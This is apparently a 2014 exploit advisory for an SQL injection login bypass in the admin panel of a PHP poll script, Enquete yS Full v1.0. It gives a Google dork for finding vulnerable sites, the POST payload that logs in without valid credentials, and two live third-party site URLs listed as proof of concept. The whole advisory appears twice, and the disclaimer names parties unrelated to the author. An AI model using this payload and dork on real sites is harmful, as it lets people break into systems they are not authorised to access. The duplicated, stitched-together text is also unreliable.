# Enquete yS - Full v. 1.0 POST SQL Injection in Panel Admin
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 08/05/2014
# Vendor Homepage: http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr
# Version: v1.0
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intitle:ys :: Painel
# Url vul : http://host/patch/enquete/admin/
# Exploit:
Post in parameters txtUsuario & txtSENHA
Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>>
Username = '- and Password = '-
# PoC : http://www.sercoladm.com.br/adm/enquete/admin/
http://www.sgnet-rs.com.br/scripts/enquete/admin/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 08/05/2014
# Vendor Homepage: http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr
# Version: v1.0
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intitle:ys :: Painel
# Url vul : http://host/patch/enquete/admin/
# Exploit:
Post in parameters txtUsuario & txtSENHA
Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>>
Username = '- and Password = '-
# PoC : http://www.sercoladm.com.br/adm/enquete/admin/
http://www.sgnet-rs.com.br/scripts/enquete/admin/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information